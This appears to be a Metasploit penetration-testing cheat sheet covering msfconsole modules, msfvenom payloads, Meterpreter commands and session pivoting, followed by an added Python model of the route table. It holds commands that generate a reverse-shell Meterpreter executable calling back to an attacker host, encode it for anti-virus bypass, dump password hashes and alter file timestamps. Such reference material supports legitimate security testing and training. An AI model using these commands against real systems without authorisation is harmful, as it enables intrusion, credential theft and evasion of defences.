Metasploit Cheat Sheet
The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.
Metasploit:
Search for module:
msf > search [regex]
Specify an exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current module:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server:
msf > use auxiliary/server/socks4
msf > run
msfvenom:
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the older msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example: Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified with -f):
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example: Encode a payload from msfpayload 5 times using the shikata_ga_nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Metasploit Meterpreter
Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID
- Target process must have same or lesser privileges
- Target process may be a more stable process
- When inside a process, can access any files that process has a lock on.
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table
Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.
Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps
Managing Sessions
Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]
Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l
Interact with a backgrounded session:
msf > sessions -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z> or meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
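The matching rule behind route add, shown as an added Python model that is not part of this cheat sheet and not Metasploit's own code: a table of (subnet, netmask, session) entries, plus a lookup that reports which session a given destination address would be pivoted through, or none when no route covers it. The class and function names (RouteTable, session_for, demo_table) are hypothetical, the sample routes are constructed, and the most-specific-match rule used when routes overlap is an assumption modelled on ordinary routing tables. It is useful for documenting a test's scope: every address the lookup resolves to a session is in-scope traffic that will leave through that session rather than directly from the console host.

```python
import ipaddress
from typing import List, Optional, Tuple

# Hypothetical model of the msfconsole route table built by
# "route add [Subnet] [Netmask] [SessionID]"; these names are not Metasploit's.
class RouteTable:
    def __init__(self) -> None:
        # (network, session_id) pairs in insertion order
        self.entries: List[Tuple[ipaddress.IPv4Network, int]] = []

    def add(self, subnet: str, netmask: str, session_id: int) -> None:
        """Mirror 'route add 10.10.10.0 255.255.255.0 1'."""
        # strict=False tolerates host bits set in the subnet argument
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        self.entries.append((net, session_id))

    def remove(self, subnet: str, netmask: str, session_id: int) -> bool:
        """Mirror 'route del ...'; returns True if an entry was dropped."""
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        before = len(self.entries)
        self.entries = [e for e in self.entries if e != (net, session_id)]
        return len(self.entries) != before

    def session_for(self, destination: str) -> Optional[int]:
        """Session a connection to `destination` would be pivoted through,
        or None when no route covers it (traffic leaves the console host directly).
        Assumption: the most specific (longest prefix) matching route wins."""
        addr = ipaddress.ip_address(destination)
        best: Optional[Tuple[ipaddress.IPv4Network, int]] = None
        for net, sid in self.entries:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return None if best is None else best[1]

    def print_routes(self) -> List[str]:
        """Rows in the spirit of 'route print': subnet, netmask, session."""
        return [f"{n.network_address} {n.netmask} session {s}" for n, s in self.entries]


def demo_table() -> RouteTable:
    # Constructed sample: two overlapping routes through two different sessions
    rt = RouteTable()
    rt.add("10.10.0.0", "255.255.0.0", 2)      # whole /16 via session 2
    rt.add("10.10.10.0", "255.255.255.0", 1)   # more specific /24 via session 1
    return rt


if __name__ == "__main__":
    rt = demo_table()
    for line in rt.print_routes():
        print(line)
    for dst in ("10.10.10.5", "10.10.20.5", "192.168.1.1"):
        print(dst, "->", rt.session_for(dst))
```

With the constructed table, 10.10.10.5 resolves to session 1 (the /24 beats the /16), 10.10.20.5 to session 2, and 192.168.1.1 to no session at all; after removing the /24 entry, 10.10.10.5 falls back to session 2.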